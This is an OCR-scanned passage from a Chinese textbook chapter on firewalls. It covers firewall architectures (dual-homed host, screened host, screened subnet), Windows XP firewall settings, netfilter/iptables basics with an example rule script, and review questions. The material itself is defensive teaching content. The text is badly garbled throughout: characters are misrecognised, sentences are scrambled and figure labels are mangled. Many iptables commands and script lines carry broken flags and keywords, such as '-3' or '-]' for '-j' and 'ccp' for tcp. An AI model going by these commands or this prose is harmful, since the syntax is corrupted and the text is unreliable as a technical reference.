以 前 的 防火 墙 仅仅 在 内 外 网 交界 处 进行 安全 控制 ， 一 旦 黑客 攻破 该 点 ， 整 个 网 络 就 暴 


6.5 复合 型 防火 墙 工作 原理 示意 图 


行 多 次 检查 ， 从 而 提高 防火 墙 的 安全 性 。 举 例 来 说 ， 在 网 络 层 ， 过 
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露 在 黑客 面前 。 随 着 黑客 技术 的 不 断 提升 ， 防 火 墙 主机 也 受到 越 来 越 大 的 安全 威胁 ， 所 以 
传统 的 防火 墙 结构 已 渐渐 不 能 适应 今天 的 企业 架构 。 

新 型 的 防火 墙 必须 是 分 布 式 的 ， 它 结合 主机 型 防火 墙 与 个 人 计算 机 型 防火 墙 ， 再 配合 
传统 型 防火 墙 的 功能 ， 让 其 各 司 其 职 ， 从 而 形成 全 方位 的 最 佳 效 能 比 的 防卫 架构 ， 也 就 是 
利用 “区 域 联防 ”技术 。 其 目的 是 利用 各 区 域 的 加 强 防卫 动作 来 化 解 攻 击 行为 。 凡 是 能 连 
入 Intemet 的 各 终端 ， 不 管 是 网 络 主机 、 服 务 器 还 是 个 人 计算 机 等 ， 都 应 该 有 一 定 的 防护 
功能 ， 以 避免 成 为 黑客 入 侵 的 漏洞 。 

3. 网 络 安全 产品 的 系统 化 


随 着 防火 墙 的 广泛 使 用 ， 人 们 也 不 断 地 发 现 防火 墙 的 局 限 性 。 与 此 同时 ， 各 种 各 样 的 
网 络 安全 产品 被 不 断 地 推出 。 因 此 如 何 能 使 网 络 安全 产品 组 成 一 个 以 防火 墙 为 核心 的 网 络 
安全 体系 也 是 业界 比较 关心 的 技术 问题 。 

在 以 防火 墙 为 核心 的 网 络 安全 体系 中 ， 防 火 墙 和 其 他 网 络 安全 产品 对 被 保护 网 络 中 出 
现 的 安全 问题 发 出 联动 的 反应 ， 从 而 最 大 限度 地 发 挥 各 个 网 络 安全 产品 的 优势 ， 提 高 被 保 
护 网 络 的 安全 性 。 

举例 来 说 ， 一 般 情况 下 ， 内 、 外 网 交界 的 位 置 是 网 络 传输 的 瓶颈 ， 为 了 降低 网 络 传输 
延迟 ， 只 有 必须 置 于 这 个 位 置 的 设备 (如 防火 墙 、 病 毒 检测 设备 等 ) 才 会 被 放置 在 这 里 ， 其 
他 设备 (如 IDS) 只 能 置 于 其 他 位 置 。 而 在 实际 使 用 中 ，IDS 的 任务 往往 不 仅 在 于 检测 入 侵 行 
为 ， 很 多 时 候 还 需要 对 发 现 的 入 侵 行为 及 时 地 做 出 反应 。 显 然 ， 这 时 需要 防火 墙 来 执行 切 
断 入 侵 连 接 的 动作 。 

除了 IDS 之 外 ， 防 火 墙 还 可 以 和 VPN、 病 毒 检 测 设备 等 进行 联动 ， 充 分 发 挥 各 自 的 长 
处 ， 协 同 配合 ， 共 同 建立 一 个 有 效 的 安全 防范 体系 。 

4. 管理 的 通用 化 

管理 通用 化 是 建立 一 个 有 效 的 安全 防范 体系 的 必要 条 件 。 如 要 使 各 个 不 同 的 网 络 安全 
产品 能 够 联动 地 做 出 反应 ， 就 必须 让 它们 都 使 用 同一 种 通用 的 “语言 ”， 也 就 是 发 展 一 种 
它们 都 能 够 理解 的 协议 。 如 此 一 来 ， 不 管 是 对 防火 墙 还 是 对 IDS、VPN、 病 毒 检测 设备 等 
网 络 安全 设备 进行 操作 ， 都 可 以 使 用 通用 的 网 络 设备 管理 方法 。 

5. 专用 化 和 硬件 化 


在 网 络 应 用 越 来 越 多 的 情况 下 ， 一 些 专用 防火 墙 概念 也 被 提 了 出 来 ， 单 向 防火 墙 (又 叫 
网 络 二 极 管 ) 就 是 其 中 的 一 种 。 单 向 防火 墙 的 目的 是 让 信息 的 单 向 流动 成 为 可 能 ， 也 就 是 网 
络 上 的 信息 只 能 从 外 网 流入 内 网 ， 而 不 能 从 内 网 流入 外 网 ， 从 而 起 到 安全 防范 作用 。 

同时 ， 将 防火 墙 中 部 分 功能 固化 到 硬件 中 ， 也 是 当前 防火 墙 技术 发 展 的 方向 。 通 过 这 
种 方式 ， 可 以 提高 防火 墙 中 瓶颈 部 分 的 执行 速度 ， 降 低 防火 墙 导 致 的 网 络 延 时 。 


6.3 防火墙 的 体系 结构 


最 简单 的 防火 墙 是 一 台 屏 蔽 路 由 器 (Screening Routen ， 此 类 防火 墙 一 旦 屏蔽 路 由 器 被 
攻陷 ， 就 会 对 整个 网 络 安全 产生 威胁 ， 所 以 一 般 不 会 使 用 这 种 结构 。 实 际 上 防火 墙 的 体系 
结构 多 种 多 样 ， 目 前 使 用 的 防火 墙 大 都 采用 以 下 几 种 体系 结构 。 
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@ ”双重 宿主 主机 结构 。 
@ 屏蔽 主机 结构 。 
@ 屏蔽 子 网 结构 。 


6.3.1 双重 宿主 主机 结构 


双重 宿主 主机 (Dual-HomedHost) 又 称 堡 驹 主机 (BastionHost)， 是 一 台 至 少 配 有 两 个 网 络 
接口 的 主机 ， 它 可 以 充当 与 这 些 接口 相连 的 网 络 之 间 的 路 由 器 ， 在 网 络 之 间 发 送 数据 包 。 
一 般 情况 下 双 宿 主机 的 路 由 功能 是 被 禁止 的 ， 因 而 能 够 隔离 内 部 网 络 与 外 部 网 络 之 间 的 直 
接 通 信 ， 从 而 起 到 保护 内 部 网 络 的 作用 。 

双重 宿主 主机 结构 如 图 6.6 所 示 ， 一 般 是 用 一 台 装 有 两 块 网 卡 的 堡垒 主机 做 防火 墙 。 
两 块 网 卡 各 自 与 内 部 网 络 和 外 部 网 络 相 连 。 堡 又 主机 上 运行 着 防火 墙 软件 ， 可 以 转发 应 
程序 、 提 供 服务 等 。 

双重 宿主 主机 结构 防火 墙 的 最 大 特点 是 P 层 的 通信 是 被 阻止 的 ， 两 个 网 络 之 间 的 通信 
可 通过 应 用 层 数据 共享 或 应 用 层 代 理 服务 来 完成 。 代 理 服务 能 够 为 用 户 提供 更 为 方便 的 访 
问 手 段 ， 也 可 以 通过 共享 应 用 层 数 据 来 访问 外 网 。 


图 6.6 双重 宿主 主机 结构 示意 图 


双重 宿主 主机 用 两 种 方式 来 提供 服务 ， 一 种 是 用 户 直 接 登 录 到 双重 宿主 主机 上 来 提供 
服务 ， 另 一 种 是 在 双重 宿主 主机 上 运行 代理 服务 器 。 
一 种 方式 需要 在 双重 宿主 主机 上 开 立 许多 账号 ， 这 是 很 危险 的 ， 原 因 如 下 。 
用 户 账号 的 存在 会 给 入 侵 者 提供 相对 容易 的 入 侵 通道 ， 每 一 个 账号 通常 有 一 个 可 
用 的 口令 ( 即 通常 用 的 口令 ， 和 一 次 性 口令 相对 )， 这 样 很 容易 被 入 侵 者 破解 。 

@ 如 果 双 重 宿主 主机 上 有 很 多 账号 ， 管 理 员 维护 起 来 很 麻烦 。 

图 支持 用 户 账号 会 降低 机 器 本 身 的 稳定 性 和 可 靠 性 。 

@ 因为 用 户 的 行为 是 不 可 预知 的 ， 如 双重 宿主 主机 上 有 很 多 用 户 账户 ， 这 会 给 入 侵 
检测 带 来 很 大 的 麻烦 。 

如 果 在 双重 宿主 主机 上 运行 代理 服务 器 ， 产 生 的 问题 相对 要 少 得 多 ， 而 且 一 些 服 务 本 
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身 的 特点 就 是 “存储 转发 ”型 的 。 当 内 网 的 用 户 要 访问 外 部 站 点 时 ， 必 须 先 经 过 代理 服务 


器 认证 ， 然 后 才 可 以 通过 代理 服务 器 访问 因特网 。 


双重 宿主 主机 是 唯一 的 隔 开 内 部 网 和 Intemet 之 间 的 屏障 ， 如 果 入 侵 者 得 到 了 双重 宿 


具有 强大 的 身份 认证 系统 ， 才 可 以 阻挡 非法 登录 。 


对 于 日 后 的 安全 检查 很 有 用 。 


能 ， 则 任何 外 网 用 户 均 可 以 随便 访问 内 网 。 


主机 的 访问 权 ， 内 部 网 络 就 会 被 入 侵 ， 所 以 为 了 保证 内 部 网 络 的 安全 ， 双 重 宿主 主机 应 


双重 宿主 主机 防火 墙 优 于 屏蔽 路 由 器 之 处 在 于 ， 其 系统 软件 可 用 于 维护 系统 日 志 ， 这 


双重 宿主 主机 防火 墙 的 一 个 致命 弱点 是 ， 一 旦 入 侵 者 侵入 堡 爸 主 机 并 使 其 具有 路 由 功 


堡垒 主机 是 用 户 的 网 络 上 最 容易 受 侵袭 的 机 器 ， 要 采取 各 种 措施 来 保护 它 。 设 计时 有 
两 条 基本 原则 : 中 堡垒 主机 要 尽 可 能 简单 ， 保 留 最少 的 服务 ， 关 闭路 由 功能 ;名 随时 做 好 


准备 ， 修 复 受 损害 的 煲 多 主机 。 
6.3.2 ”屏蔽 主机 结构 


屏蔽 主机 结构 (Screened Host Gateway) 又 称 为 主机 过 滤 结 构 。 屏 蔽 主机 结构 需要 配备 一 
台 堡 又 主机 和 一 个 有 过 滤 功 能 的 屏蔽 路 由 器 ， 其 示意 图 如 图 6.7 所 示 。 屏 蔽 路 由 器 连接 外 


部 网 络 ， 堡 又 主机 安装 在 内 部 网 络 上 。 通 常 在 路 由 器 上 设立 过 滤 规 则 ， 并 使 堡垒 


主机 成 为 


从 外 部 网 络 唯一 可 直接 到 达 的 主机 。 人 入侵 者 要 想 入 侵 内 部 网 络 ， 必 须 越过 屏蔽 路 


器 和 堡 


垒 主机 两 道 屏 障 ， 所 以 屏蔽 主机 结构 比 双重 宿主 主机 结构 具有 更 好 的 安全 性 和 可 用 


性 。 


堡垒 主机 是 外 网 主机 连接 到 内 部 网 络 的 桥梁 ， 并 且 仅 有 某 些 确定 类 型 的 连接 被 允许 (如 
传送 进来 的 电子 邮件 )。 任 何 外 部 网 络 如 果 要 试图 访问 内 部 网 络 ， 必 须 连 接 到 这 人 台 堡垒 主机 


上 。 因 此 ， 堡 又 主机 需要 有 较 高 的 安全 等 级 。 


图 6.7 屏蔽 主机 结构 示意 图 


在 屏蔽 路 由 器 中 数据 包 过 滤 可 以 按 下 列 之 一 配置 。 
Q 允许 其 他 的 内 部 主机 为 了 某 些 服务 (如 Telnet) 与 外 网 主机 连接 。 


@ 不 允许 来 自 内 部 主机 的 所 有 连接 (强迫 主机 必须 经 过 堡垒 主机 使 用 代理 服务 )。 
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用 户 可 以 针对 不 同 的 服务 混合 使 用 这 些 手 段 ， 某 些 服务 可 以 被 允许 直接 经 由 数据 包 过 
滤 ， 而 其 他 服务 可 以 被 允许 仅仅 间接 地 经 过 代理 ， 这 完全 取决 于 用 户 实行 的 安全 策略 。 
在 采用 屏蔽 主机 防火 墙 的 情况 下 ， 过 滤 路 由 器 是 否 正确 配置 是 安全 与 否 的 关键 。 过 滤 
路 由 器 的 路 由 表 应 当 受 到 严格 的 保护 ， 如 果 路 由 表 遭 到 破坏 ， 数 据 包 就 不 会 被 路 由 到 堡垒 
主机 上 ， 从 而 使 外 部 访问 越过 堡垒 主机 进入 内 网 。 
屏蔽 主机 结构 的 缺点 : 如 果 入 侵 者 有 办 法 侵入 堡 公主 机 ， 而 且 在 堡垒 主 机 和 其 他 内 部 
主机 之 间 没 有 任何 安全 保护 措施 的 情况 下 ， 整 个 网 络 对 入 侵 者 是 开放 的 。 为 了 改进 这 一 缺 
点 ， 可 以 使 用 屏蔽 子 网 。 


6.3.3 ”屏蔽 子 网 结构 


堡垒 主机 是 内 部 网 络 上 最 容易 受到 攻击 的 ， 在 屏蔽 主机 结构 中 ， 如 果 能 够 侵入 堡垒 主 
机 ， 就 可 以 毫 无 阻挡 地 进入 内 部 网 络 。 因 为 该 结构 中 屏蔽 主机 与 其 他 内 部 机 器 之 间 没 有 特 
殊 的 防御 手段 ， 内 部 网 络 对 堡垒 主机 不 做 任何 防备 。 

屏蔽 子 网 结构 (Screened Subneb 可 以 改进 这 种 状况 ， 它 是 在 屏蔽 主机 结构 的 基础 上 添加 
额外 的 安全 层 ， 即 通过 添加 周边 网 络 ( 即 屏蔽 子 网 ) 进 一 步 把 内 部 网 络 与 外 部 网 络 隔离 开 。 

一 般 情况 下 ， 屏 蔽 子 网 结构 包含 外 部 和 内 部 两 个 路 由 器 。 两 个 屏蔽 路 由 器 放 在 子 网 的 
两 端 ， 在 子 网 内 构成 一 个 “ 非 军事 区 ”(DMZ)。 有 的 屏蔽 子 网 中 还 设 有 一 台 堡 垒 主机 作为 
唯一 可 访问 点 ， 支 持 终端 交互 或 作为 应 用 网 关 代 理 。 这 种 配置 的 危险 地 带 仅 包 括 堡垒 主 
机 、 子 网 主机 及 所 有 连接 内 网 、 外 网 和 屏蔽 子 网 的 路 由 器 。 

屏蔽 子 网 结构 最 常见 的 形式 如 图 6.8 所 示 ， 通 过 在 周边 网 络 上 用 两 个 屏蔽 路 由 器 隔离 
煲 垒 主机 ， 能 减少 堡垒 主机 被 侵入 的 危害 程度 。 外 部 路 由 器 保护 周边 网 络 和 内 部 网 络 免 受 
来 自 Intemet 的 侵犯 ， 内 部 路 由 器 保护 内 部 网 络 免 受 来 自 Internet 和 周边 网 的 侵犯 。 要 侵入 
使 用 这 种 防火 墙 的 内 部 网 络 ， 入 侵 者 必须 要 通过 两 个 屏蔽 路 由 器 。 即 使 入 侵 者 能 够 侵入 堡 
又 主机 ， 内 部 路 由 器 也 将 会 阻止 他 继续 入 侵 内 部 网 络 。 


6.8 ”屏蔽 子 网 结构 示意 图 
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6.3.4 ”防火墙 的 组 合 结构 


建造 防火 墙 时 一 般 很 少 采 用 单一 结构 ， 通 常 采用 多 种 结构 的 组 合 。 这 种 组 合 主要 取决 
于 网 管 中 心 向 用 户 提供 什么 样 的 服务 ， 以 及 网 管 中 心 能 接受 什么 等 级 的 风险 。 采 用 哪 种 技 
术 还 取决 于 经 费 、 投 资 的 大 小 或 技术 人 员 的 技术 水 平 、 时 间 等 因素 。 
防火 墙 的 组 合 结构 一 般 有 以 下 几 种 形式 。 
@ 使 用 多 堡垒 主机 。 
合并 内 部 路 由 器 与 外 部 路 由 器 。 
合并 堡垒 主机 与 外 部 路 由 器 。 
合并 堡垒 主机 与 内 部 路 由 器 。 
使 用 多 台 内 部 路 由 器 。 
使 用 多 台 外 部 路 由 器 。 
使 用 多 个 周边 网 络 。 
使 用 双重 宿主 主机 与 屏蔽 子 网 。 


6.4 上 机 实践 


1. Windows 防火 墙 配 置 


在 Windows XP SP2 中 防火 墙 的 配置 如 下 : 依次 单 击 “ 开 始 ” 一 “设置 ”一 “控制 面 
板 ” 菜 单 命令 ， 然 后 单 击 “ 控 制 面板 ”中 的 “安全 中 心 ”， 再 单 击 “Windows 防火 墙 ” 选 
项 ， 即 可 打开 Windows 防火 墙 控制 台 ， 如 图 6.9 所 示 。 

(1) “常规 ”选项 卡 设置 。 如 图 6.9 所 示 ，“ 常 规 ” 选 项 卡 中 有 两 个 主 选项 和 一 个 子 
选项 。 

@ 两 个 主 选 项 : 启用 ( 推 ) 和 关闭 (不 推荐 )。 

@ 一 个 子 选项 : “不 允许 例外 ”。 

如 果 选 择 了 “不 允许 例外 ”，Windows 防火 墙 将 拦截 所 有 的 连接 用 户 计算 机 的 网 络 请 
求 ， 包 括 在 例外 选项 卡 列 表 中 的 应 用 程序 和 系统 服务 。 另 外 ， 防 火 墙 也 将 拦截 文件 和 打印 
机 共享 。 由 此 可 见 ， 使 用 “不 允许 例外 ”选项 的 Windows 防火 墙 过 于 严格 ， 所 以 比较 适用 
于 高 危 环 境 ， 如 在 宾馆 和 机 场 等 场所 连接 到 公共 网 络 上 的 个 人 计算 机 。 

默认 情况 下 已 选中 “启用 ( 推 )”。 当 Windows 防火 墙 处 于 打开 状态 时 ， 大 部 分 程序 都 
被 阻止 通过 防火 墙 。 如 果 想 要 解除 对 某 一 程序 的 阻止 ， 可 以 将 其 添加 到 “例外 ”列表 (“ 例 
外 ”选项 卡 )。 

避免 使 用 “关闭 (不 推荐 )”， 除 非 计 算 机 上 运行 了 其 他 防火 墙 。 关 闭 Windows 防火 墙 
可 能 会 使 计算 机 更 容易 受到 黑客 和 恶意 软件 的 侵害 。 

(2) “例外 ”选项 卡 。 

如 果 某 些 程序 需要 进行 网 络 通信 ， 那 么 可 以 将 它们 添加 到 “例外 ”列表 中 ， 在 列表 中 
的 程序 将 被 允许 网 络 连 接 。 

如 图 6.9 所 示 ， 在 “例外 ”选项 卡 的 下 方 有 两 个 添加 按钮 ， 分 别 是 “添加 程序 ”和 
“添加 端口 ”， 可 以 根据 具体 的 情况 手工 添加 例外 项 。 
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如 果 不 清 楚 某 个 应 用 程序 是 通过 哪个 端口 与 外 界 通信 ， 或 者 不 知道 它 是 基于 UDP 还 
是 TCP， 可 以 通过 “添加 程序 ”按钮 来 添加 例外 项 。 例 如 ， 要 允许 “Thunder( 迅 雷 )” 通 
信 ， 则 单 击 “ 添 加 程序 ”按钮 ， 选 择 应 用 程序 “D:\Program Files\Thunder Network\Thundern\ 
Thunderexe”， 然 后 单 击 “ 确 定 ”按钮 将 “Thunder( 迅 雷 )” 加 入 列表 。 


EDIT 
加 Wndors 卫 火 琅 阳 下 程序 时 通知 筷 @) 


图 6.9 Windows 防火 墙 控制 台 的 “例外 ”选项 卡 


如 果 对 端口 号 以 及 TCP/UDP 比较 熟悉 ， 则 可 以 采用 后 一 种 方式 ， 即 指定 端口 号 的 添 
加 方式 。 对 于 每 一 个 例外 项 ， 可 以 通过 “更 改 范围 ”对 话 框 指定 其 作用 域 ， 如 图 6.10 所 
示 。 对 于 家 用 和 小 型 办 公 室 应 用 网 络 ， 推 荐 设置 作用 域 为 可 能 的 本 地 网 络 。 当 然 ， 也 可 以 
自 定义 作用 域 中 的 他 范围 ， 这 样 只 有 来 自 特定 的 瑟 地 址 范围 的 网 络 请 求 才能 被 接受 。 
(3) “高 级 ”选项 卡 。 
如 果 要 使 系统 更 加 安全 ， 那 么 一 定 要 在 “高 级 ”选项 卡 中 进行 设置 。 


如 图 6.11 所 示 ， 在 “高 级 ”选项 卡 中 包含 4 组 选项 ， 即 “网 络 连接 设置 ”“ 安 全 日 志 
记录 ”“ICMP” 和 “默认 设置 ”。 
拉 和 因 2 雪 攻 二 要 为 于 人 这 扫 间 站 加 全 
二 区 
和 +， 请 单 击 下 面 的 | 
于 请 输入 以 逗号 分 隔 的 IP 地 址 ， 子 网 或 同时 包括 IF 地 0 人 
加 任何 计算 机 (包括 Tnternet 上 的 计算 机 ) 他 ) ee a 
口 芭 我 的 网 络 子 同 ) 人 _ 
加 自 定 义 有 于 四: | Ri 设置 
[se -108.0. 100, 192. 168 10.0/255. 255.255. | ] ET 
示例 ; 192. 168. 114. 201, 192. 168. 114. 201/255. 255. 255.0 | 
CC 于 
图 6.10 “更 改 范围 ”对 话 框 图 6.11 Windows 防火 墙 控制 台 的 “高 级 ”选项 卡 
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Windows 2003、Windows Vista 内 置 防火 墙 的 设置 和 Windows XP 类 似 。 
2. Linux 防火 墙 配 置 


Linux 提供 了 一 个 非常 优秀 的 防火 墙 工具 一 一 netfilter/iptables， 它 免费 、 功 能 强大 、 可 
以 对 流入 流出 的 信息 进行 灵活 控制 ， 并 且 可 以 在 一 台 低 配置 的 机 器 上 很 好 地 运行 。 

1) netfilter/iptables 介绍 

Linux 在 2.4 版 本 以 后 的 内 核 中 包含 netfilter/iptables， 系 统 这 种 内 置 的 IP 数据 包 过 滤 
工具 使 得 配置 防火 墙 和 数据 包 过 滤 变 得 更 加 容易 ， 使 用 户 可 以 完全 控制 防火 墙 配 置 和 数据 
包 过 滤 。netfilter/iptables 允许 为 防火 墙 建立 可 定制 的 规则 来 控制 数据 包 过 滤 ， 并 且 还 允许 
配置 有 状态 的 防火 墙 。 另 外 ，netfilter/iptables 还 可 以 实现 NAT( 网 络 地 址 转换 ) 和 数据 包 的 
分 割 等 功能 。netfilteriptables 从 ipchains 和 ipwadfm 演化 而 来 ， 功 能 更 加 强大 。 

netfilter 组 件 也 称 为 内 核 空间 ， 是 内 核 的 一 部 分 ， 由 一 些 数据 包 过 滤 表 组 成 ， 这 些 表 包 
含 内 核 用 来 控制 数据 包 过 滤 处 理 的 规则 集 。 

iptables 组 件 是 一 种 工具 ， 也 称 为 用 户 空间 ， 它 使 插入 、 修 改 和 删除 数据 包 过 滤 表 中 的 
规则 变 得 容易 。 

使 用 用 户 空 间 (iptables) 构 建 自己 定制 的 规则 ， 这 些 规则 存储 在 内 核 空间 的 过 滤 表 中 。 
这 些 规则 中 的 目标 告诉 内 核对 满足 条 件 的 数据 包 采 取 相 应 的 措施 。 

根据 规则 处 理 数据 包 的 类 型 ， 将 规则 添加 到 不 同 的 链 中 。 处 理 入 站 数据 包 的 规则 被 添 
加 到 INPUT 链 中 ， 处 理 出 站 数据 包 的 规则 被 添加 到 OUTPUT 链 中 ， 处 理 正在 转发 的 数据 
包 的 规则 被 添加 到 FORWARD 链 中 。 这 3 个 链 是 数据 包 过 滤 表 (filteD 中 内 置 的 默认 主 规则 
链 。 每 个 链 都 可 以 有 一 个 策略 ， 即 要 执行 的 默认 操作 ， 当 数据 包 与 链 中 的 所 有 规则 都 不 匹 
配 时 ， 将 执行 此 操作 (理想 的 策略 应 该 丢弃 该 数据 包 )。 

数据 包 经 过 filter 表 的 过 程 如 图 6.12 所 示 。 


Gre) 


本 地 处 理 进程 


6.12 ”数据 包 经 过 filter 表 的 过 程 


通过 使 用 iptables 命令 建立 过 滤 规 则 ， 并 将 这 些 规则 添加 到 内 核 空间 过 滤 表 内 的 
链 中 。 
添加 、 删 除 和 修改 规则 的 命令 语法 格式 如 下 : 


# iptables [-t table] command [match] [target] 


其 中 的 参数 说 明 如 下 。 


/isa\. 
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(1) table。 


[-t table] 有 3 种 可 用 的 表 选 项 ， 即 filter、nat 和 mangle。 该 选项 不 是 必需 的 ， 如 未 指 
， 则 filter 表 作 为 默认 表 。 
filter 表 用 于 一 般 的 数据 包 过 滤 ， 包 含 INPUT、OUTPUT 和 FORWARD 链 。 
nat 表 用 于 要 转发 的 数据 包 ， 包 含 PREROUTING 链 、OUTPUT 链 和 POSTROUTING 链 。 
mangle 表 用 于 数据 包 及 其 头 部 的 更 改 ， 包 含 PREROUTING 链 和 OUTPUT 链 。 
(2) command。 
command 是 iptables 命令 中 最 重要 的 部 分 ， 它 告诉 iptables 命令 要 进行 的 操作 ， 如 插入 
规则 、 删 除 规则 、 将 规则 添加 到 链 尾 等 。 
示例 : 
#iptables -A INPUT -s 192.168.0.10 -j] ACCEPT 
该 命令 将 一 条 规则 附加 到 INPUT 链 的 末尾 ， 确 定 来 自 源 地 址 192.168.0.10 的 数据 包 可 
以 ACCEPT。 
#iptables -D INPUT --dport 80 -j DROP 
该 命令 从 INPUT 链 删除 规则 。 
#iptables -P INPUT DROP 


该 命令 将 INPUT 链 的 默认 目标 指定 为 DROP。 这 将 丢弃 所 有 与 INPUT 链 中 任何 规则 
都 不 匹配 的 数据 包 。 


也 


(3) match 。 

match 部 分 指定 数据 包 与 规则 匹配 所 应 具有 的 特征 ， 如 源 人 P 地 址 、 目 的 人 P 地 址 、 协 
议 等 。 

示例 : 


#iptables -A INPUT -p TCP, UDP 
#iptables -A INPUT -p ! ICMP 
#iptables -A OUTPUT -s 192.168.0.10 
#iptables -A OUTPUT -s ! 210.43.1.100 
#iptables -A INPUT -d 192.168.1.1 
#iptables -A OUTPUT -d ! 210.43.1.100 


(4) target。 

目标 是 由 规则 指定 的 操作 。 

(5) 保存 规则 。 

上 述 方法 建立 的 规则 被 保存 到 内 核 中 ， 这 些 规则 在 系统 重启 时 将 丢失 。 如 果 希 望 在 
系统 重启 后 还 能 使 用 这 些 规则 ， 则 必须 使 用 iptables-save 命令 将 规则 保存 到 某 个 文件 
(iptables-script) 中 。 


#iptables-save > iptables-script 


执行 以 上 命令 后 数据 包 过 滤 表 中 的 所 有 规则 都 被 保存 到 iptables-script 文件 中 。 当 系统 
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重启 时 ， 可 以 执行 iptables-restore iptables-script 命令 将 规则 从 文件 iptables-script 中 恢复 到 
内 核 空间 的 数据 包 过 滤 表 中 。 

2) Linux 防火 墙 的 配置 
创建 “iptables_example.sh” 文 件 ， 内 容 如 图 6.13 所 示 ， 执 行 以 下 两 条 命令 : 

#service iptables start // 启 动 iptables 

#sh iptables example.sh // 配 置 防火 墙 的 过 滤 规 则 

下 面 对 “iptables_example.sh” 文 件 进行 说 明 。 

第 2 行 : 开启 内 核对 数据 包 的 转发 功能 。 

第 3 行 : 开启 内 核对 DoS(syn-flood) 攻 击 的 防范 功能 。 

第 4、5 行 : eth0(ppp0) 外 网 接口 ， 如 果 通 过 宽带 带动 局 域 网 上 网 ， 则 用 ppp0。 

第 6 行 : ethl 内 网 接口 。 

第 12 一 20 行 : 加 载 模块 。 

第 28 一 33 行 : 对 filter 和 nat 表 设 置 默认 过 滤 规 则 。 

第 35 一 38 行 : 允许 dns 连接 。 

第 40~50 行 : 根据 指定 端口 和 他 地 址 来 过 滤 掉 数据 包 。 

第 52 行 : 通过 字符 串 匹 配 来 阻止 内 网 用 户 访问 一 些 网 站 (“fund” 指 包含 该 单词 的 网 
页 受阻 )。 

第 $4 一 58 行 : 根据 是 否 是 通过 宽带 (ppp0) 带 动 局 域 网 上 网 来 选择 相应 的 规则 。 

第 64、65 行 : 拒绝 互联 网 用 户 访 问 内 网 。 

第 68、69 行 : 对 局 域 网 内 计算 机 的 MAC 和 IP 地 址 进行 绑 定 ， 可 以 防止 内 网 用 户 随 
意 修改 他 地 址 。 


1 
Zecho 1 > /proc/sys/net/ipv4/ip_forward 

3 echo 1 > /proc/sys/net/ipv4/tcp_syncookies 
4 HINET_IF="pppO" 

5 INET_IF="ethO" 

6 LAN_IF="ethi" 

7 LAN_IP_RANGE="192.168.0.0/24" 

8 IPT="/sbin/iptables" 

9 Tc="/shin/te" 

10 NODPROBE="/sbin/modprobe”" 

1 

12 $MODPROBE ip_tables 

13 $MODPROBE iptable_nat 

14 $MODPROBE ip_nat_ftp 

15 $MODPROBE ip_nat_irc 

16 $MODPROBE ipt_mark 

17 $MODPROBE ip_conntrack 

18 $MODPROBE ip_conntrack ftp 

19 $MODPROBE ip_conntrack_irc 

20 $MODPROBE ipt_NASQUERADE 

21 

22 for TABLE in filter nat mangle ; do 

23 $IPT -~t STABLE -F 

24 $IPT -c STMBLE -xX 

25 $IPT -t $TABLE -2 

26 done 

27 

28 $IPT -P INPUT DROP 

29 $IPT -P OUTPUT ACCEPT 

30 $IPT ~P FORWARD DROP 

31 $IPT ~-t nat -P PREROUTING ACCEPT 

32 $IPT -c nat -P OUTPUT ACCEPT 

33 $IPT - nat -P POSTROUTING ACCEPT 

34 

3s for DNS in $(grep ^n /etc/resolv.conflawk '{print $2})'); do 
36 $IPT ~A INPUT -p ccp -3 $DNS --sport domain -j ACCEPT 
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37 $IPT -A INPUT -p udp -= $DNS --sport domain -] ACCEPT 
38 done 


40 $IPT -A INPUT -p ccp 一 sport 1080 -3 DROP 
41 $IPT -A INPUT -p tep --sport 1090 -3 DROP 


43 $IPT -A INPUT -1 $INET_IF -= 60.2.139.192/27 -i DROP 

44 $IPT -A INPUT -+ $INET_IF -s 60.3.246.162/32 -] DROP 

45 

46 $IPT -A FORWARD -p ccp --sport 1080 -3 DROP 

47 $IPT -A FORWARD -p ccp --dport 1080 -] DROP 

4 

43 $IPT -A FORWARD -s 60.2.139.192/27 -i DROP 

So $IPT -A FORWARD -d 60.2.139.192/27 -i DROP 

51 

5z $IPT -A FORWARD -m string --algo bm --string "fund" -3 DROP 

53 

S41f [ $INET_IF = "pppo" ] ; then 

SS $IPT ~t nat -A POSTROUTING -o $INET_IF -s $LAN_IP_RANGE -i NASQUERADE 

56 else 

57 $IPT -t nat -A POSTROUTING -o $INET_IF -s $LAN_IP_RANGE -] SNAT --to-source x.x.x.x 
Sa £1 

59 

60 fno limit 

61 $IPT -A FORVARD -3 192.168.0.18 -m mac --mac-source 00-16-EC-A8-F1-A5 -1 ACCEPT 
62 $IPT -A FORWARD -d 192.166.0.18 -] ACCEPT 

63# 拒绝 INTERNET 客 户 访问 

64 $IPT -A INPUT -1 $INET_ IF -m state --state RELATED, ESTABLISHED -] ACCEPT 

65 $IPT -A INPUT -1 $INET_IF -m state --state NEW, INVALID -] DROP 

66 

67 #UAC、IP 地 址 绑 定 

68 $IPT -A FORWARD -3 192.168.0.2 -m mac --mac-source 00-18-F3-30-86-45 -3 ACCEPT 
69 $IPT -A FORWARD -s 192.168.0.3 -m mac --mac-source 00-15-60-B9-94-8E -3 ACCEPT 
70 


71 $IPT -A FORWARD -d 192.168.0.2 -3 ACCEPT 
7 


6.13 “iptables_example.sh” 文 件 


复习 思考 题 六 


一 、 填 空 题 


下 


目前 应 用 的 防火 墙 技术 主要 有 、 、 
2. 外 部 网 络 (外 网 ) 是 防火 墙 之 外 的 网 络 ， 一 般 为 。 ， 默 认为 


等 。 


3. 内 部 网 络 (内 网 ) 是 防火 墙 之 内 的 网 络 ， 一 般 为 ， 默 认为 
4. 防火 墙 的 分 类 方式 有 很 多 种 。 根 据 受 保护 的 对 象 ， 可 以 分 为 防火 墙 和 


防火 墙 ; 根据 防火 墙 主要 部 分 的 形态 ， 可 以 分 为 防火 墙 和 防火 
墙 根据 防火 墙 使 用 的 对 象 ， 可 以 分 为 防火 墙 和 防火 墙 根据 防火 墙 检 
查 数据 包 的 位 置 ， 可 以 分 为 防火 墙 、 防火 墙 和 防火 墙 。 


5. 目前 使 用 的 防火 墙 大 都 采用 以 下 几 种 体系 结构 : 
6. 防火 墙 的 体系 结构 一 般 有 结构 、 结构 、 主 机 过 滤 结构 和 


告 构 。 


二 、 选 择 题 
1. 防火 墙 ( ，) 不 通过 它 的 连接 。 


A. 不 能 控制 B. 能 控制 C. 能 过 滤 D. 能 禁止 


2. 防火 墙 是 指 ( 。 )。 


A. 一 个 特定 软件 B. 一 个 特定 硬件 
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3. 包 过 滤 防 火 墙 工作 在 (。 )。 


A. 应 用 层 B. 会 话 层 C. 传输 层 D .网络 层 
